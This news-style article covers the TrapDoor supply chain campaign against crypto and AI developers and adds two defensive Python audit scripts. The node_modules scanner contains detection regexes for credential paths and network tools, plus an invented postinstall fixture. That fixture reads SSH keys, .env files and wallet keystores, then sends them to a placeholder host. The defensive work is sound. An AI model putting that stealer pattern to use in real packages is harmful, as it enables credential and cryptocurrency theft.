A supply chain campaign called TrapDoor is now circulating through public package registries, planting 34 malicious libraries aimed at crypto and AI developers. The payload looks for wallet files, SSH keys, and API credentials, then exfiltrates them within seconds of installation. Cointelegraph flagged the campaign on May 25, citing researcher analysis of the package set.
The combination matters because the same developer machine that holds a hot wallet or a hardware wallet bridge tool usually also holds exchange API keys, deployment credentials, and signing keys for smart contracts. A single compromised laptop can expose treasury wallets, validator keys, and CI/CD secrets in one pass.
The Attack Pattern
TrapDoor follows a familiar typosquatting and dependency confusion playbook. Attackers publish packages with names that mimic legitimate libraries used in crypto wallets, AI agents, and developer tooling. When a target installs the package, an install-time lifecycle hook (an npm postinstall script, or setup code that runs while a Python package builds) executes with the developer's own privileges, in the background, and quietly searches the home directory.
The script looks for a specific set of high value files:
- Wallet data from common desktop clients (keystore files, encrypted JSON wallets, browser extension storage paths)
- SSH private keys under the user's .ssh directory
- Environment files containing exchange API keys, RPC endpoints, and cloud credentials
- Browser session data that can hijack already-authenticated web sessions
Collected data is bundled and sent to a remote endpoint. Some variants stage the exfiltration through legitimate-looking telemetry hosts to slip past corporate firewalls and DNS blocklists. The whole sequence completes before the install command returns, so most developers never notice that anything happened.
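The inverse of the hook described above is the check a developer can run before, or right after, an install: find every package in the tree that declares a lifecycle hook and look at what that hook touches. The scanner below is an added example, not code from the TrapDoor analysis or from any package it names. It walks a node_modules directory, reports each package with a preinstall/install/postinstall/prepare hook, and scores the hook command plus any local script file it invokes against indicator patterns for the shape the article describes: home-directory credential paths combined with an outbound send. The indicator regexes, the scoring rule, and the three sample packages (invented names, never executed, only read) are this example's own assumptions, not campaign IOCs.

```python
"""Audit a node_modules tree for install hooks that reference credential paths."""
import json
import re
import tempfile
from pathlib import Path
from typing import List, Optional

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Assumed indicators of a hook hunting for credentials in the home directory.
CREDENTIAL_PATTERNS = {
    "ssh_keys": re.compile(r"\.ssh\b|id_(?:rsa|ed25519|ecdsa)"),
    "wallet_files": re.compile(r"keystore|wallet\.dat|UTC--|Local Storage", re.I),
    "env_files": re.compile(r"\.env\b|AWS_SECRET|PRIVATE_KEY|API_KEY"),
    "home_dir": re.compile(r"os\.homedir\(\)|process\.env\.HOME|\$HOME|~/"),
}
# Assumed indicators of sending whatever was collected somewhere.
EXFIL_PATTERNS = {
    "network_send": re.compile(r"https?\.request|fetch\(|axios|net\.connect|dns\.resolve|curl |wget "),
    "encode": re.compile(r"base64"),
}
ALL_PATTERNS = {**CREDENTIAL_PATTERNS, **EXFIL_PATTERNS}


def _hook_texts(pkg_dir: Path, command: str) -> List[str]:
    """The inline hook command plus the contents of local script files it invokes."""
    texts = [command]
    for token in re.findall(r"[\w./-]+\.(?:js|mjs|cjs|sh)", command):
        candidate = pkg_dir / token
        if candidate.is_file():
            texts.append(candidate.read_text(errors="replace"))
    return texts


def score_package(pkg_dir: Path) -> Optional[dict]:
    """Return a finding if pkg_dir/package.json declares a lifecycle hook, else None."""
    manifest = pkg_dir / "package.json"
    if not manifest.is_file():
        return None
    try:
        data = json.loads(manifest.read_text(errors="replace"))
    except json.JSONDecodeError:
        return None
    scripts = data.get("scripts") or {}
    hooks = {h: scripts[h] for h in LIFECYCLE_HOOKS if h in scripts}
    if not hooks:
        return None
    hits = set()
    for command in hooks.values():
        for text in _hook_texts(pkg_dir, command):
            hits.update(name for name, pat in ALL_PATTERNS.items() if pat.search(text))
    cred, exfil = hits & set(CREDENTIAL_PATTERNS), hits & set(EXFIL_PATTERNS)
    # Assumed rule: credential paths AND a send path is the stealer shape; either
    # alone earns a human look; a hook with neither is just a hook (e.g. node-gyp).
    verdict = "suspicious" if cred and exfil else "review" if cred or exfil else "hook-only"
    return {"name": data.get("name", pkg_dir.name), "hooks": hooks,
            "indicators": sorted(hits), "verdict": verdict}


def audit_node_modules(root) -> List[dict]:
    """Score every package under root (a node_modules directory), nested ones included."""
    findings = [f for m in Path(root).rglob("package.json") if (f := score_package(m.parent))]
    return sorted(findings, key=lambda f: f["name"])


# Constructed fixture: an invented postinstall script with the stealer shape.
# The scanner only reads it; nothing here is ever executed.
SUSPICIOUS_SETUP_JS = """\
const fs = require('fs'); const os = require('os'); const https = require('https');
const home = os.homedir(); const loot = {};
for (const p of ['.ssh/id_ed25519', '.env', '.config/wallet/keystore']) {
  try { loot[p] = fs.readFileSync(home + '/' + p, 'utf8'); } catch (e) {}
}
const body = Buffer.from(JSON.stringify(loot)).toString('base64');
https.request({ host: 'telemetry.example.invalid', method: 'POST', path: '/v1/ping' }).end(body);
"""


def build_sample_tree(base) -> Path:
    """Write three invented packages under base/node_modules and return that path."""
    root = Path(base) / "node_modules"
    fixtures = {
        "examplepkg-benign": ({"scripts": {"install": "node-gyp rebuild"}}, None),
        "examplepkg-suspicious": ({"scripts": {"postinstall": "node setup.js"}}, SUSPICIOUS_SETUP_JS),
        "examplepkg-nohooks": ({}, None),
    }
    for name, (extra, script) in fixtures.items():
        pkg = root / name
        pkg.mkdir(parents=True)
        (pkg / "package.json").write_text(json.dumps({"name": name, "version": "1.0.0", **extra}))
        if script:
            (pkg / "setup.js").write_text(script)
    return root


def demo_audit() -> List[dict]:
    """Build the fixture in a temporary directory, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_node_modules(build_sample_tree(tmp))


if __name__ == "__main__":
    for f in demo_audit():
        print(f"{f['verdict']:11} {f['name']:24} hooks={list(f['hooks'])} indicators={f['indicators']}")
```

Run it against a real tree with `audit_node_modules("./node_modules")` after an `npm install --ignore-scripts`, so the hooks are inspected before they have had a chance to run; anything scored `suspicious` or `review` is worth reading by hand before re-running the install with scripts enabled.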
Crypto Engineers Are A Bigger Target Than Banks
A traditional banking developer who loses their laptop creates an incident, but not an instant theft. Production systems sit behind multiple control gates: hardware tokens, separate environments, mandatory deploy approvals. Crypto engineering does not always work that way.
In crypto, the keys ARE the system. A leaked mnemonic gives the attacker the same rights as the legitimate signer with no rollback path. A leaked API key for a centralized exchange account can move funds in minutes. A leaked deployer key for a smart contract can ship a malicious upgrade before the team's Discord even sees the alert.
The Ronin bridge breach, the LastPass-linked compromises of 2023, and the more recent SwissBorg incident all started with credential theft on a developer or insider machine. TrapDoor sits squarely in this lineage.
Practical Steps For Developers Right Now
If you install JavaScript, Python, or Rust packages on the same machine where you sign transactions, treat this campaign as immediate exposure. A few measures cut the blast radius without changing daily workflow:
- Move signing to a dedicated device or hardware wallet. The compromised dev box should never be able to sign by itself.
- Stop pasting seed phrases into plaintext files. If a seed must live on disk for backup, encrypt it at rest with a passphrase that is not also in the same machine's password manager.
- Use scoped API keys with IP allowlists and withdrawal disabled. Exchange API keys with withdrawal rights should not exist outside of a sealed environment.
- Pin dependencies and read install scripts before they run. Lockfiles plus a quick audit of new transitive dependencies catch most typosquats; installing with lifecycle scripts disabled (npm install --ignore-scripts) and reviewing any package that declares a preinstall or postinstall hook closes the gap a lockfile alone leaves open.
- Rotate SSH keys and any credentials that lived next to a hot wallet or AI agent project recently. The cost of rotation is hours; the cost of a stolen treasury is total.
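The dependency audit in the list above is easiest to make routine if it is a diff rather than a full read: compare the lockfile before and after the update and only look at what is new. The script below is an added example for that step, not code from the TrapDoor analysis. It reads the `packages` map of two lockfileVersion 2/3 package-lock.json documents, lists entries that were not there before, and flags any whose name sits within a couple of edits of a package you trust (typosquat shape), that resolved from a registry other than the one you expect (dependency confusion shape), or that npm marked `hasInstallScript`. The allowlist, expected registry, edit-distance threshold, and the two sample lockfiles are constructed for the example; the package names other than ethers and lodash are invented.

```python
"""Diff two npm lockfiles and flag newly added packages that deserve a human look."""
from typing import Dict, List

EXPECTED_REGISTRY = "https://registry.npmjs.org/"  # assumption: only the public registry is expected


def levenshtein(a: str, b: str) -> int:
    """Plain edit distance; package names are short enough for the O(n*m) version."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def new_entries(old_lock: dict, new_lock: dict) -> Dict[str, dict]:
    """Lock entries (keyed by node_modules path) present in new_lock but absent from old_lock."""
    old = {(p, e.get("version")) for p, e in old_lock.get("packages", {}).items() if p}
    return {p: e for p, e in new_lock.get("packages", {}).items()
            if p and (p, e.get("version")) not in old}


def review_new_dependencies(old_lock: dict, new_lock: dict, trusted: List[str],
                            max_distance: int = 2) -> List[dict]:
    """One finding per newly added package that trips any of the three checks."""
    findings = []
    for path, entry in new_entries(old_lock, new_lock).items():
        name = path.split("node_modules/")[-1]  # works for nested and @scoped entries
        reasons = []
        if name not in trusted:
            near = [t for t in trusted if levenshtein(name, t) <= max_distance]
            if near:
                reasons.append(f"name within {max_distance} edits of trusted {near}")
        resolved = entry.get("resolved", "")
        if resolved and not resolved.startswith(EXPECTED_REGISTRY):
            reasons.append(f"resolved outside expected registry: {resolved}")
        if entry.get("hasInstallScript"):
            reasons.append("declares an install script; read it before letting it run")
        if reasons:
            findings.append({"name": name, "version": entry.get("version"), "reasons": reasons})
    return findings


# Constructed sample lockfiles, trimmed to the fields used here.
OLD_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "treasury-tool", "version": "0.1.0"},
    "node_modules/ethers": {"version": "6.13.0",
                            "resolved": "https://registry.npmjs.org/ethers/-/ethers-6.13.0.tgz"},
}}
NEW_LOCK = {"lockfileVersion": 3, "packages": {
    "": {"name": "treasury-tool", "version": "0.1.1"},
    "node_modules/ethers": {"version": "6.13.0",
                            "resolved": "https://registry.npmjs.org/ethers/-/ethers-6.13.0.tgz"},
    "node_modules/lodash": {"version": "4.17.21",
                            "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz"},
    # invented typosquat of "ethers" that also carries an install script
    "node_modules/ethres": {"version": "6.13.1", "hasInstallScript": True,
                            "resolved": "https://registry.npmjs.org/ethres/-/ethres-6.13.1.tgz"},
    # invented package pulled from somewhere other than the expected registry
    "node_modules/build-telemetry": {"version": "1.0.0",
                                     "resolved": "https://cdn.example.invalid/build-telemetry-1.0.0.tgz"},
}}
TRUSTED = ["ethers", "lodash", "viem", "axios"]  # constructed allowlist


if __name__ == "__main__":
    for f in review_new_dependencies(OLD_LOCK, NEW_LOCK, TRUSTED):
        print(f"{f['name']}@{f['version']}")
        for r in f["reasons"]:
            print("   -", r)
```

Feed it the committed package-lock.json and the freshly generated one with `json.load`, and keep the allowlist to the packages your project actually imports; the edit-distance check is deliberately loose, so a short name like `viem` will produce occasional false positives that a human can dismiss in seconds.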
For everyday crypto users who do not write code, the indirect risk is real too. If a wallet provider or DeFi protocol you use has engineers compromised, the attack surface shifts to product upgrades and signed releases. This is one of the reasons self-custody options that route through hardware wallets remain the safer default for meaningful balances, even when the daily user experience is rougher than a fully custodial app.
The Pattern Is Accelerating, Not Slowing
TrapDoor lands in a year where supply chain attacks on crypto have already produced multiple nine-figure incidents. The December 2023 Ledger Connect Kit compromise, the recurring npm wallet drainers, and the AI agent token theft cluster of early 2026 all relied on the same basic technique: poison a dependency, wait for a developer to update, collect keys.
Package maintainers, registry operators, and security firms are responding with sandboxed install pipelines, mandatory two-factor authentication for publishers, and machine learning scanners. None of those defenses is universal yet. Until they are, the burden of caution sits with the developer running npm install at 2 a.m. to ship a feature.
Overview
TrapDoor is a 34 package supply chain campaign that targets crypto and AI developers by stealing wallet files, SSH keys, and API credentials within seconds of installation. The wider trend matters more than this single campaign: developer machines remain the soft underbelly of the crypto stack, and a compromise there often means direct loss of funds rather than just a recoverable incident. Engineers should move signing off shared devices, scope credentials tightly, and audit new dependencies before the next update window.